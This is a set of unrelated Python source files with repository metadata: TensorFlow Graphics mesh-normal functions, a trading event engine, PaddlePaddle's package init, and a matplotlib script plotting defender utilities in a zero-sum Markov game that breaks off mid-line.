c84b7599d1f8a55ccbdd589c1a845494c17c2784
[ "Apache-2.0" ]
null
null
null
tensorflow_graphics/geometry/representation/mesh/normals.py
drebain/graphics
c84b7599d1f8a55ccbdd589c1a845494c17c2784
[ "Apache-2.0" ]
1
2019-10-10T06:16:30.000Z
2019-10-10T06:16:30.000Z
#Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tensorflow utility functions to compute normals on meshes.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np import tensorflow as tf from tensorflow_graphics.geometry.representation import triangle from tensorflow_graphics.util import export_api from tensorflow_graphics.util import safe_ops from tensorflow_graphics.util import shape def gather_faces(vertices, indices, name=None): """Gather corresponding vertices for each face. Note: In the following, A1 to An are optional batch dimensions. Args: vertices: A tensor of shape `[A1, ..., An, V, D]`, where `V` is the number of vertices and `D` the dimensionality of each vertex. The rank of this tensor should be at least 2. indices: A tensor of shape `[A1, ..., An, F, M]`, where `F` is the number of faces, and `M` is the number of vertices per face. The rank of this tensor should be at least 2. name: A name for this op. Defaults to "normals_gather_faces". Returns: A tensor of shape `[A1, ..., An, F, M, D]` containing the vertices of each face. Raises: ValueError: If the shape of `vertices` or `indices` is not supported. """ with tf.compat.v1.name_scope(name, "normals_gather_faces", [vertices, indices]): vertices = tf.convert_to_tensor(value=vertices) indices = tf.convert_to_tensor(value=indices) shape.check_static( tensor=vertices, tensor_name="vertices", has_rank_greater_than=1) shape.check_static( tensor=indices, tensor_name="indices", has_rank_greater_than=1) shape.compare_batch_dimensions( tensors=(vertices, indices), last_axes=(-3, -3), broadcast_compatible=False) if hasattr(tf, "batch_gather"): expanded_vertices = tf.expand_dims(vertices, axis=-3) broadcasted_shape = tf.concat([tf.shape(input=indices)[:-1], tf.shape(input=vertices)[-2:]], axis=-1) broadcasted_vertices = tf.broadcast_to( expanded_vertices, broadcasted_shape) return tf.compat.v1.batch_gather(broadcasted_vertices, indices) else: return tf.gather( vertices, indices, axis=-2, batch_dims=indices.shape.ndims - 2) def face_normals(faces, clockwise=True, normalize=True, name=None): """Computes face normals for meshes. This function supports planar convex polygon faces. Note that for non-triangular faces, this function uses the first 3 vertices of each face to calculate the face normal. Note: In the following, A1 to An are optional batch dimensions. Args: faces: A tensor of shape `[A1, ..., An, M, 3]`, which stores vertices positions of each face, where M is the number of vertices of each face. The rank of this tensor should be at least 2. clockwise: Winding order to determine front-facing faces. The order of vertices should be either clockwise or counterclockwise. normalize: A `bool` defining whether output normals are normalized. name: A name for this op. Defaults to "normals_face_normals". Returns: A tensor of shape `[A1, ..., An, 3]` containing the face normals. Raises: ValueError: If the shape of `vertices`, `faces` is not supported. """ with tf.compat.v1.name_scope(name, "normals_face_normals", [faces]): faces = tf.convert_to_tensor(value=faces) shape.check_static( tensor=faces, tensor_name="faces", has_rank_greater_than=1, has_dim_equals=(-1, 3), has_dim_greater_than=(-2, 2)) vertices = tf.unstack(faces, axis=-2) vertices = vertices[:3] return triangle.normal(*vertices, clockwise=clockwise, normalize=normalize) def vertex_normals(vertices, indices, clockwise=True, name=None): """Computes vertex normals from a mesh. This function computes vertex normals as the weighted sum of the adjacent face normals, where the weights correspond to the area of each face. This function supports planar convex polygon faces. For non-triangular meshes, this function converts them into triangular meshes to calculate vertex normals. Note: In the following, A1 to An are optional batch dimensions. Args: vertices: A tensor of shape `[A1, ..., An, V, 3]`, where V is the number of vertices. indices: A tensor of shape `[A1, ..., An, F, M]`, where F is the number of faces and M is the number of vertices per face. clockwise: Winding order to determine front-facing faces. The order of vertices should be either clockwise or counterclockwise. name: A name for this op. Defaults to "normals_vertex_normals". Returns: A tensor of shape `[A1, ..., An, V, 3]` containing vertex normals. If vertices and indices have different batch dimensions, this function broadcasts them into the same batch dimensions and the output batch dimensions are the broadcasted. Raises: ValueError: If the shape of `vertices`, `indices` is not supported. """ with tf.compat.v1.name_scope(name, "normals_vertex_normals", [vertices, indices]): vertices = tf.convert_to_tensor(value=vertices) indices = tf.convert_to_tensor(value=indices) shape.check_static( tensor=vertices, tensor_name="vertices", has_rank_greater_than=1, has_dim_equals=(-1, 3)) shape.check_static( tensor=indices, tensor_name="indices", has_rank_greater_than=1, has_dim_greater_than=(-1, 2)) shape.compare_batch_dimensions( tensors=(vertices, indices), last_axes=(-3, -3), broadcast_compatible=True) shape_indices = indices.shape.as_list() if None in shape_indices[:-2]: raise ValueError("'indices' must have specified batch dimensions.") common_batch_dims = shape.get_broadcasted_shape(vertices.shape[:-2], indices.shape[:-2]) vertices_repeat = [ common_batch_dims[x] // vertices.shape.as_list()[x] for x in range(len(common_batch_dims)) ] indices_repeat = [ common_batch_dims[x] // shape_indices[x] for x in range(len(common_batch_dims)) ] vertices = tf.tile( vertices, vertices_repeat + [1, 1], name="vertices_broadcast") indices = tf.tile( indices, indices_repeat + [1, 1], name="indices_broadcast") # Triangulate non-triangular faces. if shape_indices[-1] > 3: triangle_indices = [] for i in range(1, shape_indices[-1] - 1): triangle_indices.append( tf.concat((indices[..., 0:1], indices[..., i:i + 2]), axis=-1)) indices = tf.concat(triangle_indices, axis=-2) shape_indices = indices.shape.as_list() face_vertices = gather_faces(vertices, indices) # Use unnormalized face normals to scale normals by area. mesh_face_normals = face_normals( face_vertices, clockwise=clockwise, normalize=False) if vertices.shape.ndims > 2: outer_indices = np.meshgrid( *[np.arange(i) for i in shape_indices[:-2]], sparse=False, indexing="ij") outer_indices = [np.expand_dims(i, axis=-1) for i in outer_indices] outer_indices = np.concatenate(outer_indices, axis=-1) outer_indices = np.expand_dims(outer_indices, axis=-2) outer_indices = tf.constant(outer_indices, dtype=tf.int32) outer_indices = tf.tile(outer_indices, [1] * len(shape_indices[:-2]) + [tf.shape(input=indices)[-2]] + [1]) unnormalized_vertex_normals = tf.zeros_like(vertices) for i in range(shape_indices[-1]): scatter_indices = tf.concat([outer_indices, indices[..., i:i + 1]], axis=-1) unnormalized_vertex_normals = tf.compat.v1.tensor_scatter_add( unnormalized_vertex_normals, scatter_indices, mesh_face_normals) else: unnormalized_vertex_normals = tf.zeros_like(vertices) for i in range(shape_indices[-1]): unnormalized_vertex_normals = tf.compat.v1.tensor_scatter_add( unnormalized_vertex_normals, indices[..., i:i + 1], mesh_face_normals) vector_norms = tf.sqrt( tf.reduce_sum( input_tensor=unnormalized_vertex_normals**2, axis=-1, keepdims=True)) return safe_ops.safe_unsigned_div(unnormalized_vertex_normals, vector_norms) # API contains all public functions and classes. __all__ = export_api.get_functions_and_classes()
39.144681
80
0.678769
13fd212eb7923e35a380b483a671761992aaef1b
4,090
py
Python
helix/engines.py
phantomii/helix
88a7270f20554943fa2cb22e1432d0f653ba9ae7
[ "Apache-2.0" ]
null
null
null
helix/engines.py
phantomii/helix
88a7270f20554943fa2cb22e1432d0f653ba9ae7
[ "Apache-2.0" ]
null
null
null
helix/engines.py
phantomii/helix
88a7270f20554943fa2cb22e1432d0f653ba9ae7
[ "Apache-2.0" ]
null
null
null
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # # Copyright 2016-2017 Eugene Frolov <eugene@frolov.net.ru> # # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import abc import logging import threading import time import six from helix.dm import events from helix.events import base class OnStartEngine(base.Event): pass class OnStopEngine(base.Event): pass LOG = logging.getLogger(__name__) @six.add_metaclass(abc.ABCMeta) class AbstractGroupOfInstruments(object): def __init__(self, instruments): super(AbstractGroupOfInstruments, self).__init__() self._instruments = instruments def get_current_timestamp(self): return time.time() @abc.abstractmethod def on_loop(self): raise NotImplementedError() def __iter__(self): return iter(self._instruments) class GroupOfHistoricalInstruments(AbstractGroupOfInstruments): def _select_instrument(self): target_instrument = None next_tick_time = float("inf") for instrument in self._instruments: if instrument.get_next_tick_info().timestamp < next_tick_time: target_instrument = instrument return target_instrument def get_current_timestamp(self): target_instrument = self._select_instrument() return target_instrument.get_next_tick_info().timestamp def on_loop(self): target_instrument = self._select_instrument() target_instrument.on_loop() class EventEngine(threading.Thread): """Event engine parameters: :param event_bus: - Instance of helix.events.Eventbus class :param instruments: - Instance of AbstractGroupOfInstruments child """ def __init__(self, event_bus, instruments): super(EventEngine, self).__init__() self._event_bus = event_bus self._market_timestamp = 0 self._instruments = instruments self._set_market_timestamp(instruments.get_current_timestamp()) self._idle_timeout = 10 self._event_bus.subscribe(OnStopEngine, self._stop_event_handler) self._event_bus.subscribe(events.OnTickEvent, self._set_market_timestamp_handler) self._stop = False def get_ide_timeout(self): return self._idle_timeout def set_idle_timeout(self, timeout): self._idle_timeout = timeout def get_market_timestamp(self): return self._market_timestamp def _set_market_timestamp(self, timestamp): if self._market_timestamp < timestamp: self._market_timestamp = timestamp def _set_market_timestamp_handler(self, event): self._set_market_timestamp(event.get_tick().timestamp) def get_instruments(self): return self._instruments def get_instrument(self, name): for instrument in self._instruments: if instrument.name == name: return instrument raise ValueError("Instrument %s not found" % name) def get_event_bus(self): return self._event_bus def run(self): self._event_bus.fire(OnStartEngine()) while not self._stop: # get new tick events self._instruments.on_loop() if self._event_bus.is_empty(): time.sleep(self._idle_timeout) self._event_bus.process_events() LOG.info("Engine stopped") def _stop_event_handler(self, event): self._stop = True def stop(self): self._event_bus.fire(OnStopEngine())
28.013699
78
0.685575
02725751cb6694a774cd224c53a0bea6b8dc680b
12,739
py
Python
python/paddle/__init__.py
Joejiong/Paddle
6d6ea569dc1e9ff15fdc774c79276b0f79444f5e
[ "Apache-2.0" ]
1
2021-02-08T02:09:19.000Z
2021-02-08T02:09:19.000Z
python/paddle/__init__.py
Joejiong/Paddle
6d6ea569dc1e9ff15fdc774c79276b0f79444f5e
[ "Apache-2.0" ]
1
2020-09-22T08:54:49.000Z
2020-09-22T11:44:09.000Z
python/paddle/__init__.py
Joejiong/Paddle
6d6ea569dc1e9ff15fdc774c79276b0f79444f5e
[ "Apache-2.0" ]
null
null
null
# Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os try: from paddle.version import full_version as __version__ from paddle.version import commit as __git_commit__ except ImportError: import sys sys.stderr.write('''Warning with import paddle: you should not import paddle from the source directory; please install paddlepaddle*.whl firstly.''' ) import paddle.batch batch = batch.batch from .fluid import monkey_patch_variable from .fluid.dygraph import monkey_patch_math_varbase monkey_patch_variable() monkey_patch_math_varbase() import paddle.framework from .framework import VarBase as Tensor import paddle.compat import paddle.distributed import paddle.sysconfig import paddle.tensor import paddle.distribution import paddle.nn import paddle.distributed.fleet import paddle.optimizer import paddle.metric import paddle.device import paddle.regularizer import paddle.incubate import paddle.autograd # TODO: define alias in tensor and framework directory from .tensor.random import randperm from .tensor.random import bernoulli from .tensor.attribute import rank #DEFINE_ALIAS from .tensor.attribute import shape #DEFINE_ALIAS from .tensor.attribute import real #DEFINE_ALIAS from .tensor.attribute import imag #DEFINE_ALIAS from .tensor.creation import to_tensor #DEFINE_ALIAS from .tensor.creation import diag #DEFINE_ALIAS from .tensor.creation import eye #DEFINE_ALIAS # from .tensor.creation import fill_constant #DEFINE_ALIAS # from .tensor.creation import get_tensor_from_selected_rows #DEFINE_ALIAS from .tensor.creation import linspace #DEFINE_ALIAS from .tensor.creation import ones #DEFINE_ALIAS from .tensor.creation import ones_like #DEFINE_ALIAS from .tensor.creation import zeros #DEFINE_ALIAS from .tensor.creation import zeros_like #DEFINE_ALIAS from .tensor.creation import arange #DEFINE_ALIAS from .tensor.creation import eye #DEFINE_ALIAS from .tensor.creation import full #DEFINE_ALIAS from .tensor.creation import full_like #DEFINE_ALIAS from .tensor.creation import triu #DEFINE_ALIAS from .tensor.creation import tril #DEFINE_ALIAS from .tensor.creation import meshgrid #DEFINE_ALIAS from .tensor.creation import empty #DEFINE_ALIAS from .tensor.creation import empty_like #DEFINE_ALIAS from .tensor.creation import assign #DEFINE_ALIAS from .tensor.linalg import matmul #DEFINE_ALIAS from .tensor.linalg import dot #DEFINE_ALIAS # from .tensor.linalg import einsum #DEFINE_ALIAS from .tensor.linalg import norm #DEFINE_ALIAS from .tensor.linalg import transpose #DEFINE_ALIAS from .tensor.linalg import dist #DEFINE_ALIAS from .tensor.linalg import t #DEFINE_ALIAS from .tensor.linalg import cross #DEFINE_ALIAS from .tensor.linalg import cholesky #DEFINE_ALIAS # from .tensor.linalg import tensordot #DEFINE_ALIAS from .tensor.linalg import bmm #DEFINE_ALIAS from .tensor.linalg import histogram #DEFINE_ALIAS from .tensor.linalg import mv #DEFINE_ALIAS from .tensor.logic import equal #DEFINE_ALIAS from .tensor.logic import greater_equal #DEFINE_ALIAS from .tensor.logic import greater_than #DEFINE_ALIAS from .tensor.logic import is_empty #DEFINE_ALIAS #from .tensor.logic import isfinite #DEFINE_ALIAS from .tensor.logic import less_equal #DEFINE_ALIAS from .tensor.logic import less_than #DEFINE_ALIAS from .tensor.logic import logical_and #DEFINE_ALIAS from .tensor.logic import logical_not #DEFINE_ALIAS from .tensor.logic import logical_or #DEFINE_ALIAS from .tensor.logic import logical_xor #DEFINE_ALIAS from .tensor.logic import not_equal #DEFINE_ALIAS from .tensor.logic import allclose #DEFINE_ALIAS from .tensor.logic import equal_all #DEFINE_ALIAS # from .tensor.logic import isnan #DEFINE_ALIAS from .tensor.logic import is_tensor #DEFINE_ALIAS from .tensor.manipulation import cast #DEFINE_ALIAS from .tensor.manipulation import concat #DEFINE_ALIAS from .tensor.manipulation import expand #DEFINE_ALIAS from .tensor.manipulation import broadcast_to #DEFINE_ALIAS from .tensor.manipulation import expand_as #DEFINE_ALIAS from .tensor.manipulation import tile #DEFINE_ALIAS from .tensor.manipulation import flatten #DEFINE_ALIAS from .tensor.manipulation import gather #DEFINE_ALIAS from .tensor.manipulation import gather_nd #DEFINE_ALIAS from .tensor.manipulation import reshape #DEFINE_ALIAS from .tensor.manipulation import reshape_ #DEFINE_ALIAS from .tensor.manipulation import flip as reverse #DEFINE_ALIAS from .tensor.manipulation import scatter #DEFINE_ALIAS from .tensor.manipulation import scatter_ #DEFINE_ALIAS from .tensor.manipulation import scatter_nd_add #DEFINE_ALIAS from .tensor.manipulation import scatter_nd #DEFINE_ALIAS from .tensor.manipulation import shard_index #DEFINE_ALIAS from .tensor.manipulation import slice #DEFINE_ALIAS from .tensor.manipulation import split #DEFINE_ALIAS from .tensor.manipulation import squeeze #DEFINE_ALIAS from .tensor.manipulation import squeeze_ #DEFINE_ALIAS from .tensor.manipulation import stack #DEFINE_ALIAS from .tensor.manipulation import strided_slice #DEFINE_ALIAS from .tensor.manipulation import transpose #DEFINE_ALIAS from .tensor.manipulation import unique #DEFINE_ALIAS from .tensor.manipulation import unsqueeze #DEFINE_ALIAS from .tensor.manipulation import unsqueeze_ #DEFINE_ALIAS from .tensor.manipulation import unstack #DEFINE_ALIAS from .tensor.manipulation import flip #DEFINE_ALIAS from .tensor.manipulation import unbind #DEFINE_ALIAS from .tensor.manipulation import roll #DEFINE_ALIAS from .tensor.manipulation import chunk #DEFINE_ALIAS from .tensor.math import abs #DEFINE_ALIAS from .tensor.math import acos #DEFINE_ALIAS from .tensor.math import asin #DEFINE_ALIAS from .tensor.math import atan #DEFINE_ALIAS from .tensor.math import ceil #DEFINE_ALIAS from .tensor.math import cos #DEFINE_ALIAS from .tensor.math import tan #DEFINE_ALIAS from .tensor.math import cosh #DEFINE_ALIAS from .tensor.math import cumsum #DEFINE_ALIAS # from .tensor.math import elementwise_add #DEFINE_ALIAS # from .tensor.math import elementwise_div #DEFINE_ALIAS # from .tensor.math import elementwise_floordiv #DEFINE_ALIAS # from .tensor.math import elementwise_mod #DEFINE_ALIAS # from .tensor.math import elementwise_pow #DEFINE_ALIAS # from .tensor.math import elementwise_sub #DEFINE_ALIAS from .tensor.math import exp #DEFINE_ALIAS from .tensor.math import floor #DEFINE_ALIAS from .tensor.math import increment #DEFINE_ALIAS from .tensor.math import log #DEFINE_ALIAS from .tensor.math import log2 #DEFINE_ALIAS from .tensor.math import log10 #DEFINE_ALIAS from .tensor.math import multiplex #DEFINE_ALIAS from .tensor.math import pow #DEFINE_ALIAS from .tensor.math import reciprocal #DEFINE_ALIAS # from .tensor.math import reduce_max #DEFINE_ALIAS # from .tensor.math import reduce_min #DEFINE_ALIAS # from .tensor.math import reduce_prod #DEFINE_ALIAS # from .tensor.math import reduce_sum #DEFINE_ALIAS from .tensor.math import all #DEFINE_ALIAS from .tensor.math import any #DEFINE_ALIAS from .tensor.math import round #DEFINE_ALIAS from .tensor.math import rsqrt #DEFINE_ALIAS from .tensor.math import scale #DEFINE_ALIAS from .tensor.math import sign #DEFINE_ALIAS from .tensor.math import sin #DEFINE_ALIAS from .tensor.math import sinh #DEFINE_ALIAS from .tensor.math import sqrt #DEFINE_ALIAS from .tensor.math import square #DEFINE_ALIAS from .tensor.math import stanh #DEFINE_ALIAS from .tensor.math import sum #DEFINE_ALIAS from .tensor.math import tanh #DEFINE_ALIAS from .tensor.math import tanh_ #DEFINE_ALIAS from .tensor.math import add_n #DEFINE_ALIAS from .tensor.math import max #DEFINE_ALIAS from .tensor.math import maximum #DEFINE_ALIAS from .tensor.math import min #DEFINE_ALIAS from .tensor.math import minimum #DEFINE_ALIAS from .tensor.math import mm #DEFINE_ALIAS from .tensor.math import divide #DEFINE_ALIAS from .tensor.math import floor_divide #DEFINE_ALIAS from .tensor.math import remainder #DEFINE_ALIAS from .tensor.math import mod #DEFINE_ALIAS from .tensor.math import floor_mod #DEFINE_ALIAS from .tensor.math import multiply #DEFINE_ALIAS from .tensor.math import add #DEFINE_ALIAS from .tensor.math import subtract #DEFINE_ALIAS from .tensor.math import atan #DEFINE_ALIAS from .tensor.math import logsumexp #DEFINE_ALIAS from .tensor.math import inverse #DEFINE_ALIAS from .tensor.math import log1p #DEFINE_ALIAS from .tensor.math import erf #DEFINE_ALIAS from .tensor.math import addmm #DEFINE_ALIAS from .tensor.math import clip #DEFINE_ALIAS from .tensor.math import trace #DEFINE_ALIAS from .tensor.math import kron #DEFINE_ALIAS from .tensor.math import isfinite #DEFINE_ALIAS from .tensor.math import isinf #DEFINE_ALIAS from .tensor.math import isnan #DEFINE_ALIAS from .tensor.math import prod #DEFINE_ALIAS from .tensor.math import broadcast_shape #DEFINE_ALIAS from .tensor.math import conj #DEFINE_ALIAS from .tensor.random import multinomial #DEFINE_ALIAS from .tensor.random import standard_normal from .tensor.random import normal from .tensor.random import uniform #DEFINE_ALIAS from .tensor.random import randn #DEFINE_ALIAS from .tensor.random import rand #DEFINE_ALIAS from .tensor.random import randint #DEFINE_ALIAS from .tensor.random import randperm #DEFINE_ALIAS from .tensor.search import argmax #DEFINE_ALIAS from .tensor.search import argmin #DEFINE_ALIAS from .tensor.search import argsort #DEFINE_ALIAS # from .tensor.search import has_inf #DEFINE_ALIAS # from .tensor.search import has_nan #DEFINE_ALIAS from .tensor.search import masked_select #DEFINE_ALIAS from .tensor.search import topk #DEFINE_ALIAS from .tensor.search import where #DEFINE_ALIAS from .tensor.search import index_select #DEFINE_ALIAS from .tensor.search import nonzero #DEFINE_ALIAS from .tensor.search import sort #DEFINE_ALIAS from .tensor.to_string import set_printoptions #DEFINE_ALIAS from .framework.random import seed #DEFINE_ALIAS from .framework.random import get_cuda_rng_state #DEFINE_ALIAS from .framework.random import set_cuda_rng_state #DEFINE_ALIAS from .framework import ParamAttr #DEFINE_ALIAS # from .framework import create_global_var #DEFINE_ALIAS from .framework import create_parameter #DEFINE_ALIAS from .framework import CPUPlace #DEFINE_ALIAS from .framework import CUDAPlace #DEFINE_ALIAS from .framework import CUDAPinnedPlace #DEFINE_ALIAS from .framework import grad #DEFINE_ALIAS from .framework import no_grad #DEFINE_ALIAS from .framework import save #DEFINE_ALIAS from .framework import load #DEFINE_ALIAS from .framework import DataParallel #DEFINE_ALIAS from .framework import set_default_dtype #DEFINE_ALIAS from .framework import get_default_dtype #DEFINE_ALIAS from .tensor.search import index_sample #DEFINE_ALIAS from .tensor.stat import mean #DEFINE_ALIAS # from .tensor.stat import reduce_mean #DEFINE_ALIAS from .tensor.stat import std #DEFINE_ALIAS from .tensor.stat import var #DEFINE_ALIAS # from .fluid.data import data from .tensor.stat import numel #DEFINE_ALIAS from .tensor.stat import median #DEFINE_ALIAS from .device import get_cudnn_version from .device import set_device from .device import get_device from .device import is_compiled_with_cuda #DEFINE_ALIAS from .device import is_compiled_with_xpu from .device import XPUPlace # from .tensor.tensor import Tensor #DEFINE_ALIAS # from .tensor.tensor import LoDTensor #DEFINE_ALIAS # from .tensor.tensor import LoDTensorArray #DEFINE_ALIAS from .fluid.dygraph.base import enable_dygraph as disable_static #DEFINE_ALIAS from .fluid.dygraph.base import disable_dygraph as enable_static #DEFINE_ALIAS from .fluid.framework import in_dygraph_mode as in_dynamic_mode #DEFINE_ALIAS from .fluid.layers import crop_tensor as crop #DEFINE_ALIAS from . import jit from . import static from . import amp from . import onnx # high-level api from .hapi import Model from .hapi import callbacks from .hapi import summary from .hapi import flops import paddle.text import paddle.vision disable_static()
44.079585
90
0.81278
7cdbe5c5563fc4649f21b2c662a3f27ea1cdec9c
12,317
py
Python
src/zero_sum/plots.py
sbhambr1/MarkovGameSolvers
cd5366faf2082e467dc0ef04c52c5b5b000e9176
[ "MIT" ]
null
null
null
src/zero_sum/plots.py
sbhambr1/MarkovGameSolvers
cd5366faf2082e467dc0ef04c52c5b5b000e9176
[ "MIT" ]
null
null
null
src/zero_sum/plots.py
sbhambr1/MarkovGameSolvers
cd5366faf2082e467dc0ef04c52c5b5b000e9176
[ "MIT" ]
null
null
null
import matplotlib.pyplot as plt import numpy as np strategies = np.array([ [ #gamma = 0.5 [-9.563336572173805, -8.193748914742143, -10.270220524396596, -3.0000000000000004, -7.553846153846153, -7.904142011834319, -3.0, -3.0, -3.0, -3.0], [-7.378487640724603, -3.3197512739857147, -7.496142688168831, -3.0000000000000004, -3.0, -3.0, -3.0, -3.0, -3.0, -3.0], [-9.314285714285715, -6.0, -11.8, -6.0, -6.0, -6.0, -6.0, -6.0, -6.0, -6.0] ], [ #gamma = 0.55 [-10.524329851693846, -9.121195380360348, -11.382794510864285, -3.333333333333334, -8.308123249299719, -8.767977779347031, -3.333333333333334, -3.333333333333334, -3.333333333333334, -3.333333333333334], [-7.853847828218031, -3.71793284163171, -7.966237505840968, -3.333333333333334, -3.333333333333333, -3.333333333333333, -3.333333333333334, -3.333333333333334, -3.333333333333334, -3.333333333333334], [-10.028985507246377, -6.666666666666666, -13.11111111111111, -6.666666666666666, -6.666666666666666, -6.666666666666666, -6.666666666666666, -6.666666666666666, -6.666666666666666, -6.666666666666666] ], [ #gamma = 0.6 [-11.719684181565645, -10.273338406900049, -12.76628614916286, -3.75, -9.231481481481477, -9.840534979423865, -3.75, -3.75, -3.75, -3.75], [-8.42965572232598, -4.21204039850597, -8.528273788767603, -3.7499999999999982, -3.7499999999999982, -3.7499999999999982, -3.7499999999999982, -3.7499999999999982, -3.7499999999999982, -3.7499999999999982], [-10.911764705882351, -7.499999999999999, -14.441176470588236, -7.499999999999999, -7.499999999999999, -7.499999999999999, -7.499999999999999, -7.499999999999999, -7.499999999999999, -7.499999999999999] ], [ #gamma = 0.65 [-13.246274902675406, -11.742746583844642, -14.533245644719841, -4.285714285714285, -10.388807069219439, -11.206747339173734, -4.285714285714285, -4.285714285714285, -4.285714285714285, -4.285714285714285], [-9.145905020699661, -4.841618667247477, -9.218958552423087, -4.285714285714285, -4.285714285714285, -4.285714285714285, -4.285714285714283, -4.285714285714283, -4.285714285714283, -4.285714285714283], [-12.03411513859275, -8.57142857142857, -15.616204690831555, -8.57142857142857, -8.57142857142857, -8.57142857142857, -8.57142857142857, -8.57142857142857, -8.57142857142857, -8.57142857142857] ], [ #gamma = 0.7 [-15.26280962470669, -13.681019910677742, -16.868493443177165, -4.999999999999998, -11.883720930232553, -13.004326663061104, -4.999999999999998, -4.999999999999998, -4.999999999999998, -4.999999999999998], [-10.068193838520614, -5.671752735193775, -10.099054988853647, -4.999999999999998, -4.999999999999998, -4.999999999999998, -4.999999999999998, -4.999999999999998, -4.999999999999998, -4.999999999999998], [-13.515151515151512, -9.999999999999996, -17.15151515151515, -9.999999999999996, -9.999999999999996, -9.999999999999996, -9.999999999999996, -9.999999999999996, -9.999999999999996, -9.999999999999996] ], [ #gamma = 0.75 [-18.048619027086353, -16.354914089347076, -20.098144329896904, -5.999999999999999, -13.893333333333327, -15.47199999999999, -5.999999999999998, -5.999999999999998, -5.999999999999998, -5.999999999999998], [-11.364085664816024, -6.829408299891047, -11.362958194659226, -5.999999999999998, -5.999999999999998, -5.999999999999998, -5.999999999999998, -5.999999999999998, -5.999999999999998, -5.999999999999998], [-15.569230769230767, -11.999999999999996, -19.261538461538457, -11.999999999999996, -11.999999999999996, -11.999999999999996, -11.999999999999996, -11.999999999999996, -11.999999999999996, -11.999999999999996] ], [ #gamma = 0.8 [-22.14552188552189, -20.28181818181818, -24.856363636363632, -7.500000000000002, -16.749999999999993, -19.062499999999993, -7.5, -7.500000000000002, -7.500000000000002, -7.500000000000002], [-13.227691215343736, -8.540503875101978, -13.175865235686418, -7.5, -7.500000000000001, -7.5, -7.499999999999998, -7.5, -7.5, -7.5], [-18.625, -15.0, -22.375, -15.0, -15.0, -15.0, -15.0, -15.0, -15.0, -15.0] ], [ #gamma = 0.85 [-28.76278844268961, -26.61680527433105, -32.56131830251732, -9.999999999999993, -21.169811320754697, -24.752580989676016, -9.999999999999993, -9.999999999999993, -9.999999999999993, -9.999999999999993], [-16.183356468130675, -11.33189687650437, -16.033301790463963, -9.999999999999993, -9.999999999999991, -9.999999999999993, -9.999999999999993, -9.999999999999993, -9.999999999999993, -9.999999999999993], [-23.68253968253967, -19.999999999999986, -27.49206349206348, -19.999999999999986, -19.999999999999986, -19.999999999999986, -19.999999999999986, -19.999999999999986, -19.999999999999986, -19.999999999999986] ], [ #gamma = 0.9 [-41.27742867847752, -38.58932362753994, -47.172156505914224, -14.999999999999755, -29.095238095237843, -35.13605442176845, -14.999999999999753, -14.999999999999753, -14.999999999999753, -14.999999999999753], [-21.789898957859354, -16.75709624029196, -21.448166972857727, -14.99999999999974, -14.99999999999974, -14.999999999999744, -14.999999999999735, -14.999999999999744, -14.999999999999744, -14.999999999999744], [-33.74193548387047, -29.999999999999503, -37.61290322580595, -29.999999999999503, -29.999999999999503, -29.999999999999503, -29.999999999999503, -29.999999999999503, -29.999999999999503, -29.999999999999503] ], [ #gamma = 0.95 [-74.330382553884, -70.25959327963282, -85.68377649107512, -29.99999408538547, -49.09676827893381, -60.80124278465696, -29.999994085385474, -29.99999408538546, -29.999994085385453, -29.999994085385445], [-37.67557701062915, -32.430971145564975, -36.94165998316571, -29.999994085385467, -29.999994085385474, -29.99999408538546, -29.999994085385474, -29.99999408538546, -29.999994085385453, -29.999994085385445], [-63.80326685929545, -59.99998817077086, -67.73769308880364, -59.99998817077086, -59.99998817077086, -59.99998817077086, -59.99998817077086, -59.99998817077086, -59.99998817077086, -59.99998817077086] ] ]) gamma = np.array([0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9,0.95]) #Plot 1 V0_URS = [] V0_OPT = [] V0_MMP = [] for i in range(len(strategies)): V0_URS.append(strategies[i][0][0]) V0_OPT.append(strategies[i][1][0]) V0_MMP.append(strategies[i][2][0]) plt.plot(gamma, np.asarray(V0_URS), marker='o') plt.plot(gamma, np.asarray(V0_OPT), marker='x') plt.plot(gamma, np.asarray(V0_MMP), marker='+') plt.ylabel("Defender's Utility $\longrightarrow$") plt.xlabel("$\gamma \longrightarrow$") plt.title("Defender's value in state S0.") plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left') plt.show() #Plot 2 V1_URS = [] V1_OPT = [] V1_MMP = [] for i in range(len(strategies)): V1_URS.append(strategies[i][0][1]) V1_OPT.append(strategies[i][1][1]) V1_MMP.append(strategies[i][2][1]) plt.plot(gamma, np.asarray(V1_URS), marker='o') plt.plot(gamma, np.asarray(V1_OPT), marker='x') plt.plot(gamma, np.asarray(V1_MMP), marker='+') plt.ylabel("Defender's Utility $\longrightarrow$") plt.xlabel("$\gamma \longrightarrow$") plt.title("Defender's value in state S1.") plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left') plt.show() #Plot 3 V2_URS = [] V2_OPT = [] V2_MMP = [] for i in range(len(strategies)): V2_URS.append(strategies[i][0][2]) V2_OPT.append(strategies[i][1][2]) V2_MMP.append(strategies[i][2][2]) plt.plot(gamma, np.asarray(V2_URS), marker='o') plt.plot(gamma, np.asarray(V2_OPT), marker='x') plt.plot(gamma, np.asarray(V2_MMP), marker='+') plt.ylabel("Defender's Utility $\longrightarrow$") plt.xlabel("$\gamma \longrightarrow$") plt.title("Defender's value in state 